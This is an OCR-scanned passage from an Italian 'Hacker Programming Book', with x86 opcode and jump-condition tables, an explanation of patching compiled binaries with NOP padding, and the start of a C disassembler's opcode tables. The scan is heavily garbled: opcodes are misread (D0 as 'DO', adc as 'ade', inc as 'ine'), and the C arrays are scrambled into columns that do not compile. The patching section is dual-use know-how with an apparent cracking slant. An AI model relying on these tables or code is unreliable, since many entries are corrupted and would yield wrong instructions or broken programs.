Set [SP-2] to DS, then decrement SP by 2 


06 




PUSH ES 




Set [SP-2] to ES, then decrement SP by 2 


OF AO 




PUSH FS 


3 


Set [SP-2] to FS, then decrement SP by 2 


OF A8 




PUSH GS 


3 


Set [SP-2] to GS, then decrement SP by 2 


6A ib 




PUSH ib 


1 


Push sign-extended immediate byte 


68 iv 




PUSH iv 


1 


Set [SP—2] to immediate word, then decrement SP by 2 


FF /6 




PUSH mv 




Set [SP—2] to memory word, then decrement SP by 2 


50+rw 




PUSH rv 




Set [SP—2] to word register, then decrement SP by 2 


16 




PUSH SS 




Set [SP-2] to SS, then decrement SP by 2 


60 




PUSHA 


1 


Push AX,CX,DX,BX, originai SP,BP,SI,DI 


60 




PUSHAD 


3 Push EAX, ECX, EDX, EBX, originai ESP, EBP, ESI, EDI 


9C 




PUSHF 




Set [SP-2] to flags register, then decrement SP by 2 


9C 




PUSHFD 


3 


Set [SP-4] to eflags reg, then decr SP by 4 


DO /2 




RCL eb, 1 




Rotate 9-bit quantity (CF, EA byte) left once 


D2 /2 




RCL eb,CL 




Rotate 9-bit quantity (CF, EA byte) left CL times 


CO /2 


ib 


RCL eb, ib 


1 


Rotate 9-bit quantity (CF, EA byte) left ib times 


DI /2 




RCL ev,l 




Rotate v+l-bit quantity (CF, EA word) left once 


D3 /2 




RCL ev, CL 




Rotate v+l-bit quantity (CF, EA word) left CL times 


CI /2 


ib 


RCL ev, ib 


1 


Rotate v+l-bit quantity (CF, EA word) left ib times 


DO /3 




RCR eb, 1 




Rotate 9-bit quantity (CF, EA byte) right once 


D2 /3 




RCR eb,CL 




Rotate 9-bit quantity (CF, EA byte) right CL times 


CO /3 


ib 


RCR eb, ib 


1 


Rotate 9-bit quantity (CF, EA byte) right ib times 


DI /3 




RCR ev, 1 




Rotate v+l—bit quantity (CF, EA word) right once 


D3 /3 




RCR ev, CL 




Rotate v+l-bit quantity (CF, EA word) right CL times 


CI /3 


ib 


RCR ev, ib 


1 


Rotate v+l—bit quantity (CF, EA word) right ib times 


OF 32 




RDMSR 


5 


Read Model Specific Reg §ECX to EDXEAX 


OF 31 




RDTSC 


5 


Read Time Stamp Counter to EDXEAX 


F3 




REP (prefix) 




Repeat following MOVS , LODS , STOS , INS , or OUTS CX times 


65 




REPC (prefix) 


N Repeat following CMPS or SCAS CX times or until CF=0 


F3 




REPE (prefix) 




Repeat following CMPS or SCAS CX times or until ZF=0 


64 




REPNC (prfix) 


N Repeat following CMPS or SCAS CX times or until CF=1 


F2 




REPNE (prfix) 




Repeat following CMPS or SCAS CX times or until ZF=1 


F2 




REPNZ (prfix) 




Repeat following CMPS or SCAS CX times or until ZF=1 


F3 




REPZ (prefix) 




Repeat following CMPS or SCAS CX times or until ZF=0 


CB 




RETE 




Return to far Caller (pop offset, then seg) 


C3 




RET 




Return to near Caller (pop offset only) 


CA iw 




RETE iw 




RET (far), pop offset, seg, iw bytes 


C2 iw 




RET iw 




RET (near), pop offset, iw bytes pushed before Cali 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



DO /0 


ROL eb,l 




Rotate 8-bit EA byte left once 


D2 /0 


ROL eb,CL 




Rotate 8-bit EA byte left CL times 


CO /0 ib 


ROL eb, ib 


1 


Rotate 8-bit EA byte left ib times 


DI /0 


ROL ev,l 




Rotate 16- or 32— bit EA vword left once 


D3 /0 


ROL ev, CL 




Rotate 16- or 32-bit EA vword left CL times 


CI /0 ib 


ROL ev, ib 


1 


Rotate 16 or 32-bit EA vword left ib times 


OF 28/0 


ROL4 eb 


N 


Rotate nibbles: Heb=Leb HAL, Leb=LAL LAL=Heb 


DO /l 


ROR eb,l 




Rotate 8— bit EA byte right once 


D2 /l 


ROR eb,CL 




Rotate 8-bit EA byte right CL times 


CO /l ib 


ROR eb, ib 


1 


Rotate 8-bit EA byte right ib times 


DI /l 


ROR ev,l 




Rotate 16— or 32— bit EA vword right once 


D3 /l 


ROR ev, CL 




Rotate 16— or 32— bit EA vword right CL times 


CI /l ib 


ROR ev, ib 


1 


Rotate 16— or 32— bit EA vword right ib times 


OF 2A/0 


ROR4 eb 


N 


Rotate nibbles: Leb=Heb Heb=LAL AL=eb 


OF AA 


RSM 


5 


Resumé from System Management mode 


9E 


SAHF 




Store AH into flags SF ZF xx AF xx PF xx CF 


DO /4 


SAL eb, 1 




Multiply EA byte by 2, once 


D2 /4 


SAL eb,CL 




Multiply EA byte by 2, CL times 


CO /4 ib 


SAL eb, ib 


1 Multiply EA byte by 2, ib times 


DI /4 


SAL ev,l 




Multiply EA vword by 2, once 


D3 /4 


SAL ev,CL 




Multiply EA vword by 2, CL times 


CI /4 ib 


SAL ev, ib 


1 Multiply EA word by 2, ib times 


DO /7 


SAR eb, 1 




Signed divide EA byte by 2, once 


D2 /7 


SAR eb,CL 




Signed divide EA byte by 2, CL times 


CO /7 ib 


SAR eb, ib 


1 


Signed divide EA byte by 2, ib times 


DI /7 


SAR ev,l 




Signed divide EA vword by 2, once 


D3 /7 


SAR ev, CL 




Signed divide EA vword by 2, CL times 


CI /7 ib 


SAR ev, ib 


1 


Signed divide EA vword by 2, ib times 


1C ib 


SBB AL, ib 




Subtract with borrow immediate byte from AL 


1D iv 


SBB eAX, iv 




Sùbtract with borrow immediate word from eAX 


80 /3 ib 


SBB eb,ib 




Subtract with borrow immediate byte from EA byte 


18 /r 


SBB eb,rb 




Subtract with borrow byte register from EA byte 


83 /3 ib 


SBB ev, ib 




Subtract with borrow immediate byte from EA word 


81 /3 iv 


SBB ev, iv 




Subtract with borrow immediate word from EA word 


19 /r 


SBB ev, rv 




Subtract with borrow word register from EA word 


1A /r 


SBB rb, eb 




Subtract with borrow EA byte from byte register 


IB /r 


SBB rv, ev 




Subtract with borrow EA word from word register 


AE 


SCAS mb 




Compare bytes AL — ES : [DI] , advance DI 


AF 


SCAS mv 




Compare vwords eAX — ES: [DI] , advance DI 


AE 


SCASB 




Compare bytes AL - ES:[DI], advance DI 


AF 


SCASD 




Compare dwords EAX - ES: [DI], advance DI 


AF 


SCASW 




Compare words AX — ES: [DI], advance DI 


OF 14/0 


SETBIT eb,CL 


N 


Set bit CL of eb 


OF 15/0 


SETBIT ew,CL 


N 


Set bit CL of ew 


OF 1C/0 ib 


SETBIT eb,ib 


N 


Set bit ib of eb 


OF 1D/0 ib 


SETBIT ev, ib 


N 


Set bit ib of ew 


OF 9n /r 


SETcond eb 


3 


Set eb byte to 1 if condition, 0 if not 


OF 01 /0 


SGDT m 


2 


Store 6— byte Global Descriptor Table register to M 


DO /4 


SHL eb, 1 




Multiply EA byte by 2, once 


D2 /4 


SHL eb, CL 




Multiply EA byte by 2, CL times 


CO /4 ib 


SHL eb,ib 


1 


Multiply EA byte by 2, ib times 


DI /4 


SHL ev,l 




Multiply EA word by 2, once 


D3 /4 


SHL ev,CL 




Multiply EA word by 2, CL times 


CI /4 ib 


SHL ev,ib 


1 


Multiply EA word by 2, ib times 


OF A5/r 


SHLD ev, rv, CL 


3 


Set ev to high of ( (ev, rv) SHL CL) 


OF A4/r ib 


SHLD ev, rv, ib 


3 


Set ev to high of ( (ev, rv) SHL ib) 


DO /5 


SHR eb, 1 




Unsigned divide EA byte by 2, once 


D2 /5 


SHR eb,CL 




Unsigned divide EA byte by 2, CL times 


CO /5 ib 


SHR eb,ib 


1 


Unsigned divide EA byte by 2, ib times 


DI /5 


SHR ev,l 




Unsigned divide EA word by 2, once 


D3 /5 


SHR ev,CL 




Unsigned divide EA word by 2, CL times 


CI /5 ib 


SHR ev,ib 


1 


Unsigned divide EA word by 2, ib times 


OF AD/r 


SHRD ev, rv, CL 


3 


Set ev to low of ((rv,ev) SHR CL) 


OF AC/r ib 


SHRD ev, rv, ib 


3 


Set ev to low of ( (rv, ev) SHR ib) 


OF 01 /l 


SIDT m 


2 


Store 6— byte Interrupt Descriptor Table register to M 


OF 00 /0 


SLOT ew 


2 


Store Locai Descriotor Table reaister to EA word 
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36 


SS 






Use SS segment for the following memory reference 


F9 


STC 






Set carry flag 


FD 


STD 






Set direction flag so SI and DI will decrement 


FB 


STI 






Set interrupt enable flag, interrupts enabled 


OF 31 /r 


STOBITS 


rb, rb 


N 


Store AX to ES :DI, bit rb (incr. DI,rb), rb+1 bits 


OF 39/0 ib 


STOBITS 


rb, ib 


N 


Store AX to ES:DI,bit rb (incr. DI,rb) , ib+1 bits 


AA 


STOS mb 






Store AL to byte [DI], advance DI 


AB 


STOS mv 






Store eAX to word [DI], advance DI 


AA 


STOSB 






Store AL to byte ES:[DI], advance DI 


AB 


STOSD 






Store EAX to dword ES: [DI], advance DI 


AB 


STOSW 






Store AX to word ES:[DI], advance DI 


OF 00 /l 


STR ew 




2 


Store Task Register to EA word 



2C ib 




SUB AL, ib 


2D iv 




SUB eAX, iv 


80 /5 


ib 


SUB eb, ib 


28 /r 




SUB eb, rb 


83 /5 


ib 


SUB ev, ib 


81 /5 


iv 


SUB ev, iv 


29 /r 




SUB ev, rv 


2A /r 




SUB rb, eb 


2B /r 




SUB rv, ev 


OF 22 




SUB4S 


A8 ib 




TEST AL, ib 


A9 iv 




TEST eAX, iv 


F6 /0 


ib 


TEST eb, ib 


84 /r 




TEST eb, rb 


F7 /0 


iv 


TEST ev, iv 


85 /r 




TEST ev, rv 


84 /r 




TEST rb, eb 


85 /r 




TEST rv, ev 



Subtract immediate byte from AL 
Subtract immediate word from eAX 
Subtract immediate byte from EA byte 
Subtract byte register from EA byte 
Subtract immediate byte from EA word 
Subtract immediate word from EA word 
Subtract word register from EA word 
Subtract EA byte from byte register 
Subtract EA word from word register 
N Sub CL nibbles BCD, DS:SI - ES:DI (CL even,NZ) 

AND immediate byte into AL for flags only 
AND immediate word into eAX for flags only 
AND immediate byte into EA byte for flags only 
AND byte register into EA byte for flags only 
AND immediate word into EA word for flags only 
AND word register into EA word for flags only 
AND EA byte into byte register for flags only 
AND EA word into word register for flags only 



OF 10/0 TESTBIT eb, CL N 
OF 11/0 TESTBIT ev, CL N 
OF 18/0 ib TESTBIT eb, ib N 
OF 19/0 ib TESTBIT ew, ib N 



Test bit CL of eb, set Z flag 

Test bit CL of ew, set Z flag 

Test bit ib of eb, set Z flag 

Test bit ib of ew, set Z flag 



OF 00 /4 VERR ew 2 Set ZF=1 if segment can be read, selector ew 

OF 00 /5 VERW ew 2 Set ZF=1 if segment can be written to, selector ew 

9B WAIT Wait until BUSY pin is inactive (HIGH) 

OF 09 WBINVD 4 Write Back and Invalidate the Data Cache 

OF 30 WRMSR 5 Write EDXEAX to Model Specific Reg §ECX 

OF CO /r XADD eb, rb 4 Exchange eb with rb then add into new eb 

OF CI /r XADD ev, rv 4 Exchange ev with rv then add into new ev 

9r XCHG eAX, rv Exchange word register with eAX 

86 /r XCHG eb, rb Exchange byte register with EA byte 

87 /r XCHG ev, rv Exchange word register with EA word 

86 /r XCHG rb, eb Exchange EA byte with byte register 
9r XCHG rv, eAX Exchange with word register 

87 /r XCHG rv, ev Exchange EA word with word register 



XLAT mb Set AL to memory byte [BX + unsigned AL] 

XLATB Set AL to memory byte DS:[BX + unsigned AL] 

XOR AL, ib Exclusive-OR immediate byte into AL 

XOR eAX, iv Exclusive—OR immediate word into eAX 

XOR eb, ib Exclusive-OR immediate byte into EA byte 

XOR eb, rb Exclusive-OR byte register into EA byte 

XOR ev, ib Exclusive-OR immediate byte into EA word 

XOR ev, iv Exclusive-OR immediate word into EA word 

XOR ev, rv Exclusive—OR word register into EA word 

XOR rb, eb Exclusive-OR EA byte into byte register 

XOR rv, ev Exclusive—OR EA word into word register 

Una nota particolare riguarda i codici relativi ai salti a seguito di controlli come ad esempio jne, je ecc. 




Jxx — Jump Instructions Table 

Mnemonic Meaning Jump Condition 

JA Jump if Above CF=0 and ZF=0 

JAE Jump if Above or Equal CF=0 

JB Jump if Below CF=1 

JBE Jump if Below or Equal CF=1 or ZF=1 

JC Jump if Carry CF=1 
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JCXZ 


Jump 


if CX Zero 


cx=o 


JE 


Jump 


if Equal 


ZF=1 


JG 


Jump 


if Greater (signed) 


ZF=0 and SF=OF 


JGE 


Jump 


if Greater or Equal (signed) 


SF=OF 


JL 


Jump 


if Less (signed) 


SF != OF 


JLE 


Jump 


if Less or Equal (signed) 


ZF=1 or SF != OF 


JMP 


Unconditional Jump 


unconditional 


JNA 


Jump 


if Not Above 


CF=1 or ZF=1 


JNAE 


Jump 


if Not Above or Equal 


CF=1 


JNB 


Jump 


if Not Below 


CF=0 


JNBE 


Jump 


if Not Below or Equal 


CF=0 and ZF=0 


JNC 


Jump 


if Not Carry 


CF=0 


JNE 


Jump 


if Not Equal 


ZF=0 


JNG 


Jump 


if Not Greater (signed) 


ZF=1 or SF != OF 


JNGE 


Jump 


if Not Greater or Equal (signed) 


SF != OF 


JNL 


Jump 


if Not Less (signed) 


SF=OF 


JNLE 


Jump 


if Not Less or Equal (signed) 


ZF=0 and SF=OF 


JNO 


Jump 


if Not Overflow (signed) 


OF=0 


JNP 


Jump 


if No Parity 


PF=0 


JNS 


Jump 


if Not Signed (signed) 


SF=0 


JNZ 


Jump 


if Not Zero 


ZF=0 


JO 


Jump 


if Overflow (signed) 


0F=1 


JP 


Jump 


if Parity 


PF=1 


JPE 


Jump 


if Parity Even 


PF=1 


JPO 


Jump 


if Parity Odd 


PF=0 


JS 


Jump 


if Signed (signed) 


SF=1 


JZ 


Jump 


if Zero 


ZF=1 






Clocks 


Size 


Operands 




808x 286 386 486 


Bytes 


Jx: jump 




16 7+m 7+m 3 


2 


no jump 


4 3 3 1 





Jx near— label — — 7+m 3 4 

no jump --31 

- It'a a good programming practice to organize code so the 
expected case is executed without a jump since the actual 
jump takes longer to execute than falling through the test . 

- see JCXZ and JMP for their respective timings 



Bisogna fare un discorso particolare a riguardo di alcune tecniche di riempimento. 

Quando disponiamo del codice sorgente eseguiamo la modifica e ricompiliamo tutto. 

Nel nostro caso non avremo mai a ddisposizione i sources per cui le modifiche dovremo 

apportarle a file binari gi compilati. 

Nella memoria esistono dati e codici operativi. 

Il processore come fa ad interpretare in un modo o nell'altro queste informazioni ? 

Quando il processore inizia l'esecuzione del codice i registri CS:IP puntano all'istruzione 

corrente da eseguire. 

Questa viene presa e riconosciuta in base al codice operativo, quelli visti prima. 

Ogni istruzione dispone di una lunghezza particolare per cui l'interprete del microcodice, 

all'interno del processore, aggiorna IP a puntare all'istruzione successiva spostando l'indirizzo 

precedente di n bytes ovvero quanti erano quelli relativi alla lunghezza dell'istruzione 

eseguita. 

Se noi andiamo a modificare delle istruzioni è possibile che quelle che inseriamo non siano di 
lunghezza in bytes uguali a quella precedente. 

In questo caso tutto il programma andrebbe a farsi benedire in quanto lo sfasamento sarebbe 
differente. 

Facciamo un esempio pratico. 

Supponiamo che ci sia un istruzione di lunghezza di due bytes e dopo un'altra di lunghezza x. 
Originariamente il processore leggerebbe il codice operativo dell'istruzione , la seguirebbe e 
successivamente inserirebbe in CS:IP l'indirizzo corrente + 2 bytes (la lunghezza 
dell'sitruzione eseguita) per cu leggerebbe l'istruzione dopo. 

Se noi andiamo a sostituire la prima ed inseriamoun istruzione di un solo byte il processore 
dopo la lettura e l'esecuzione della prima istruzione cercherebbe di leggere l'istruzione 
all'indirizzo corrente + 1 byte leggendo qualche codice dovuto alla sporcizia di memoria. 
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Quando andiamo ad inserire istruzioni di lunghezza non corretta dobbiamo compensare con 

istruzioni nulle la memoria. 

Questa istruzione nulla (NO OPERATION) e' : 

NOP Nessuna operazione 90 

Questa è la casistica che capita quando la sostituzione è relativa a codici pi corti rispetto agli 
originali. 

Nel caso in cui invece il codice da inserire sia pi lungo dovremo eseguire delle operazioni di 
rilocazione. 

Un semplice dissasemblatore creabile con i prodotti BORLAND è il seguente. 

Il programma è composto da due file .C. 

Il primo è quello che contiene la table delle istruzioni assembler : 

/* table. c */ 

/* Percent tokens in strings : 
First char after ' % ' : 
A - direct address 

C - reg of r/m picks control register 
D - reg of r/m picks debug register 
E - r/m picks operand 
F - flags register 

G - reg of r/m picks general register 

1 - immediate data 

J - relative IP offset 
+ K - call/jmp distance 

M — r/m picks memory 
O - no r/m, offset only 
R - mod of r/m picks register only 
S - reg of r/m picks segment register 
T - reg of r/m picks test register 
X - DS:ESI 
Y - ES:EDI 

2 - prefix of two-byte opcode 

+ e - put in 'e' if use32 (second char is part of reg name) 

+ put in 'w' for usel6 or 'd' for use32 (second char is 'w') 

+ j - put in 'e' in jcxz if prefix==0x66 

f - floating point (second char is esc value) 

g - do r/m group 'n ' , n==0 . . 7 

p — prefix 

s - size override (second char is a,o) 
+ d - put d if doublé arg, nothing otherwise (pushfd, popfd &c) 

+ w - put w if word, d if doublé arg, nothing otherwise (lodsw/lodsd) 

+ P - simple prefix 

Second char after '%': 

a — two words in memory (BOUND) 

b - byte 

c - byte or word 

d - dword 
+ f - far call/jmp 

+ n - near call/jmp 

p - 32 or 48 bit pointer 
+ q - byte/word thingy 

s - six byte pseudo-descriptor 

v - word or dword 
w - word 
+ x - sign extended byte 

F - use floating regs in mod/rm 

1-8 - group number, esc value, etc 

*/ 

/* watch out for aad && aam with odd operands */ 
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char *opmapl [256] = 


{ 






/* 


0 */ 










"add %Eb, %Gb", 


"add %Ev, %Gv", 


"add %Gb, %Eb", 


"add %Gv, %Ev", 




"add al, %Ib" , 


"add %eax, %Iv", 


"push es", 


"pop es", 




"or %Eb, %Gb", 


"or %Ev, %Gv", 


"or %Gb,%Eb", 


"or %Gv, %Ev", 




"or al,%Ib", 


"or %eax, %Iv", 


"push cs", 


"%2 ", 


/* 


1 */ 










"ade %Eb, %Gb", 


"ade %Ev, %Gv", 


"ade %Gb, %Eb", 


"ade %Gv, %Ev", 




"ade al, %Ib", 


"ade %eax, %Iv", 


"push ss", 


"pop ss ", 




"sbb %Eb, %Gb", 


"sbb %Ev, %Gv", 


"sbb %Gb, %Eb", 


"sbb %Gv, %Ev", 




"sbb al, %Ib", 


"sbb %eax, %Iv", 


"push ds", 


"pop ds", 


/* 


2 */ 










"and %Eb, %Gb", 


"and %Ev, %Gv", 


"and %Gb, %Eb", 


"and %Gv, %Ev", 




"and al, %Ib", 


"and %eax, %Iv", 


"%pe", 


"daa ", 




"sub %Eb, %Gb", 


"sub %Ev, %Gv", 


"sub %Gb, %Eb", 


"sub %Gv, %Ev", 




"sub al, %Ib", 


"sub %eax, %Iv", 


"%pc ", 


"das", 


/* 


3 */ 










"xor %Eb, %Gb", 


"xor %Ev, %Gv", 


"xor %Gb, %Eb", 


"xor %Gv, %Ev", 




"xor al, %Ib", 


"xor %eax, %Iv", 


"%ps ", 


"aaa ", 




"emp %Eb, %Gb", 


"emp %Ev, %Gv", 


"emp %Gb, %Eb", 


"emp %Gv, %Ev", 




"emp al, %Ib", 


"emp %eax, %Iv", 


"%pd", 


"aas", 


/* 


4 */ 










"ine %eax", 


"ine %ecx", 


"ine %edx", 


"ine %ebx", 




"ine %esp", 


"ine %ebp", 


"ine %esi ", 


"ine %edi", 




"dee %eax", 


"dee %ecx", 


"dee %edx", 


"dee %ebx", 




"dee %esp", 


"dee %ebp", 


"dee %esi", 


"dee %edi", 


/* 


5 */ 










"push %eax", 


"push %ecx", 


"push %edx", 


"push %ebx", 




"push %esp", 


"push %ebp", 


"push %esi", 


"push %edi", 




"pop %eax", 


"pop %ecx", 


"pop %edx", 


"pop %ebx", 




"pop %esp", 


"pop %ebp", 


"pop %esi ", 


"pop %edi", 


/* 


6 */ 










"pusha%d », 


"popa%d ", 


"bound %Gv, %Ma", 


"arpl %Ew, %Rw", 




"%pf", 


"%pg", 


"%so", 


"%sa ", 




"push %Iv", 


"imul %Gv, 


%Ev, %Iv", "push %Ix 


"imul 


%Gv, %Ev, %Ib", 










"insb", 


"ins%ew" , 


"outsb", 


"outs%ew", 


/* 


7 V 










"jo %Jb", 


"jno %Jb", 


"jc %Jb", 


"jne %Jb", 




"je %Jb", 


"jne %Jb", 


"jbe %Jb", 


"ja %Jb", 




"js %Jb", 


"jns %Jb", 


"jpe %Jb", 


"jpo %Jb", 




"jl %Jb", 


"jge %Jb", 


"jle %Jb", 


"jg %Jb", 


/* 


8 */ 








/* 
*/ 


"%g0 %Eb,%Ib", 


"%g0 %Ev, %Iv", 


"%g0 %Ev,%Ib", 


"%g0 %Ev,%Ib", 




"%g0 %Eb,%Ib", 


"%g0 %Ev, %Iv", 


"%g0 %Ev, %Ix", 


"%g0 %Ev, %Ix", 




"test %Eb,%Gb", 


"test %Ev, %Gv", 


"xchg %Eb,%Gb", 


"xchg %Ev,%Gv", 




"mov %Eb, %Gb", 


"mov %Ev, %Gv", 


"mov %Gb, %Eb", 


"mov %Gv, %Ev", 




"mov %Ew, %Sw", 


"lea %Gv,%M ", 


"mov %Sw, %Ew", 


"pop %Ev", 


/* 


9 */ 










"nop", 


"xchg %ecx,%eax", 


"xchg %edx, %eax", 


"xchg %ebx, %eax", 




"xchg %esp, %eax", 


"xchg %ebp, %eax", 


"xchg %esi, %eax", 


"xchg %edi, %eax", 




"cbw", 


"cwd", 


"cali %Ap", 


"fwait ", 




"pushf%d », 


"popf%d ", 


"sahf", 


"lahf", 


/* 


a */ 










"mov al, %Oc", 


"mov %eax, %Ov", 


"mov %Oc,al", 


"mov %Ov, %eax", 




"%P movsb", 


"%P movs%w", 


"%P empsb", 


"%P cmps%w ", 




"test al,%Ib", 


"test %eax, %Iv", 


"%P stosb", 


"%P stos%w », 




"%P lodsb", 


"%P lods%w ", 


"%P scasb", 


"%P scas%w », 


/* 


b */ 










"mov al, %Ib", 


"mov ci, %Ib", 


"mov dl,%Ib", 


"mov bl, %Ib", 




"mov ah, %Ib", 


"mov ch,%Ib", 


"mov dh,%Ib", 


"mov bh, %Ib", 




"mov %eax, %Iv", 


"mov %ecx, %Iv", 


"mov %edx, %Iv", 


"mov %ebx, %Iv", 




"mov %esp, %Iv", 


"mov %ebp, %Iv", 


"mov %esi, %Iv", 


"mov %edi, %Iv", 


/* 


e */ 










"%gl %Eb,%Ib", 


"%gl %Ev,%Ib", 


"ret %Iw", 


"ret ", 




"les %Gv,%Mp", 


"lds %Gv,%Mp", 


"mov %Eb, %Ib", 


"mov %Ev, %Iv", 
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"int 03", 

/* d */ 

"%gl %Eb,l", 
"aam ; %Ib" , 

#if 0 

"esc 0,%lb", 
"esc 4,%Ib", 

#else 
"%f0", 
"%f4", 

tendi f 

/* e */ 

"loopne %Jb", 
"in al, %Ib", 
"cali %Jv", 
"in al,dx", 

/* f */ 

"lock %p ", 
"hit ", 
"eie", 
"cld", 



"int %Ib", 

"%gl %Ev,l", 
"aad ; %Ib", 

"esc l,%Ib", 
"esc 5, %Ib", 

"%fl ", 
"%f5", 



"loope %Jb", 
"in %eax,%Ib", 
"jmp %Jv", 
"in %eax,dx", 

0, 

"cmc", 
"stc", 
"std", 



"into", 

"%gl %Eb,cl", 
"setalc", 

"esc 2, %Ib", 
"esc 6,%Ib", 

"%f2", 
"%f6", 



"loop %Jb", 
"out %Ib,al", 
"jmp %Ap", 
"out dx,al", 

"repne %p ", 
"%g2", 
"eli ", 
"%g3", 



"iret ", 

"%gl %Ev,cl", 
"xlat ", 

"esc 3, %Ib", 
"esc 7,%Ib", 

"%f3", 
"%f7", 



"j%j cxz %Jb", 
"out %Ib,%eax", 
"jmp %Ks%Jb", 
"out dx,%eax", 

"repe %p ", 
"%g2", 
"sti ", 
"%g4" 



char *second[] = { 
/* 0 */ 

"%g5", 

0, 

"invd", 
0, 

/* 1 */ 

"mov %Eb, %Gb", 

0, 

0, 

0, 

/* 2 */ 

"mov %Rd, %Cd", 
"mov %Rd,%Td", 
0, 
0, 



"jo %Jv", 

"jz %Jv", 

"js %Jv", 

"jl %Jv", 
/* 9 */ 

"seto %Eb", 

"setz %Eb", 

"sets %Eb", 

"seti %Eb", 
/* a */ 

"push fs", 

"shld %Ev, %Gv, 



"%g6", 
"loadall ", 
"wbinvd", 
0, 

"mov %Ev, %Gv", 

0, 

0, 

0, 

"mov %Rd, %Dd", 
0, 
0, 
0, 



/* 3 


*/ 














0, 


0, 


0, 


o, 


o, 


o, 


o, 


o, 


0, 


0, 


0, 


o, 


o, 


o, 


o, 


o, 


/* 4 


*/ 














0, 


0, 


0, 


o, 


o, 


o, 


o, 


o, 


0, 


0, 


0, 


o, 


o, 


o, 


o, 


o, 


/* 5 


*/ 














0, 


0, 


o, 


o, 


o, 


o, 


o, 


o, 


0, 


0, 


o, 


o, 


o, 


o, 


o, 


o, 


/* 6 


*/ 














0, 


0, 


o, 


o, 


o, 


o, 


o, 


o, 


0, 


0, 


o, 


o, 


o, 


o, 


o, 


o, 


/* 7 


*/ 














0, 


0, 


o, 


o, 


o, 


o, 


o, 


o, 


0, 


0, 


o, 


o, 


o, 


o, 


o, 


o, 


/* 8 


*/ 















"jno %Jv", 

"jnz %Jv", 

"jns %Jv", 

"jge %Jv", 

"setno %Eb", 

"setnz %Eb", 

"setns %Eb", 

"setge %Eb", 

"pop fs", 
%Ib", "shld %Ev,%Gv,cl' 



"lar %Gv, %Ew", 
"clts", 

Or 

0, 

"mov %Gb, %Eb", 

Or 
0, 
Or 

"mov %Cd, %Rd", 
"mov %Td, %Rd", 
0, 

Or 



"jb %Jv", 
"jbe %Jv", 
"jp %Jv", 
"jle %Jv", 

"sete %Eb", 
"setbe %Eb", 
"setp %Eb", 
"setle %Eb", 

Or 
Or 



"lsl %Gv, %Ew", 
"loadall ", 

Or 
Or 

"mov %Gv, %Ev", 

Or 
Or 
Or 

"mov %Dd, %Rd", 

Or 
Or 
Or 



"jnb %Jv", 
"ja %Jv", 
"jnp %Jv", 
"jg %Jv", 

"setne %Eb", 
"setnbe %Eb", 
"setnp %Eb", 
"setg %Eb", 

"bt %Ev,%Gv", 
0, 
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"push gs", 
"shrd %Ev, %Gv, %Ib " 
/* b */ 

"cmpxchg %Eb,%Gb", 

"lfs %Mp", 

0, 

"bsf %Gv, %Ev", 
/* c */ 

"xadd %Eb, %Gb", 
0, 

"bswap eax", 
"bswap esp", 



/* d 


*/ 










0, 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


/* e 


*/ 










Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


/* f 


*/ 










Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 


Or 



"pop gs", 

"shrd %Ev, %Gv, ci ", 

"cmpxchg %Ev, %Gv", 
"lgs %Mp", 

Or 

"bsr %Gv, %Ev", 
"xadd %Ev, %Gv", 

Or 

"bswap ecx", 
"bswap ebp", 

Or 0, 
Or Or 

Or 0, 
Or 0, 

Or 0, 
Or Or 



Or 
Or 

"lSS %Mp"r 

"movzx %Gv, %Eb", 
"%g7 %Ev, %Ib"r 
"movsx %Gv, %Eb", 

Or 
Or 

"bswap edx"r 

"bswap esi ", 



"bts %Ev, %Gv"r 
"imul %Gv, %Ev", 

"btr %Ev, %Gv", 
"movzx %Gv, %Ew", 
"btc %Ev, %Gv"r 
"movsx %Gv, %Ew"r 

Or 
Or 

"bswap ebx"r 
"bswap edl", 



char *groups[] [8] = { /* group 0 Is group 3 for %Ev set */ 
/* 0 */ 

"or", "ade", "sbb", 

"sub", 



{ "add", 
"and", 
}, 

/* 1 */ 
{ "rol", 
"shl ", 

}, 

/* 2 */ /* v v*/ 
{ "test %Eq, %Iq", 
"mul %Ec", 
/* 3 */ 

{ "ine %Eb", 
0, 

}r 

/* 4 */ 

{ "ine %Ev", 

"jmp %Kn%Ev", 

ir 

/* 5 */ 

{ "sldt %Ew"r 
"verr %Ew", 

ir 

/* 6 */ 

{ "sgdt %Ms", 
"smsw %Ew", 

ir 

/* 7 */ 

{ Or 

"bt ", 

}; 



"ror", 



"rei ", 



"rcr", 



"shr", 



"test %Eq, %Iq", 
"Imul %Ec", 

"dee %Eb", 
0, 



"shl " 



"not %Ev", 
"div %Ec", 

0, 



"neg %Ev", 
"Idiv %Ec" }, 

0, 



0, 



"dee %Ev", 

"jmp %Kf%Ep", 



"cali %Kn%Ev", "cali %Kf%Ep", 
"push %Ev", 



"str %Ew", 

"verw %Ew", 



"sldt %Ms", 
0, 



0, 

"bts", 



"lldt %Ew", 
0, 



"lgdt %Ms", 



Or 

"btr" , 



"ltr %Ew", 



"lldt %Ms", 
"lmsw %Ew", 



Or 

"btc" 



/* zero here means invalid. If first entry starts wlth '*', use st(l) */ 
/* no assumed %EFs here. Indexed by RM(modrm() ) */ 
char *f0[] = { 0, 0, 0, 0, 0, 0, 0, 0} ; 

{ "*fxch st, %GF" }; 
{ "fnop", 0, 0, 0, 0, 0, 0, 0 }; 
{ "fchs", "fabs", 0, 0, "ftst", "fxam", 0, 0 } ; 
char *fop_13[] = { "fidi", "fldl2t", "fldl2e", "fldpi", 

"fldlg2", "fldln2", "fldz", 0 }; 
char *fop_14[] = { "f2xml", "fyl2x", "fptan", "fpatan", 

"fxtract", "fpreml", "fdecstp", "flncstp" }; 



char *fop_9[] 
char *fop_10[] 
char *fop_12[] 



rhar *fop_15[] = { "fpr, 



"fy!2xpl", "fsqrt", "fsi 
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char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 
char 



*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 
*fop_ 



21 [1 
2811 
32 [] 
33[] 
36H 
37[1 
38U 
39H 
4011 
4211 
43U 
4411 
45H 
4811 
49H 
5111 
52[1 
53H 
54[1 
55[1 
60H 



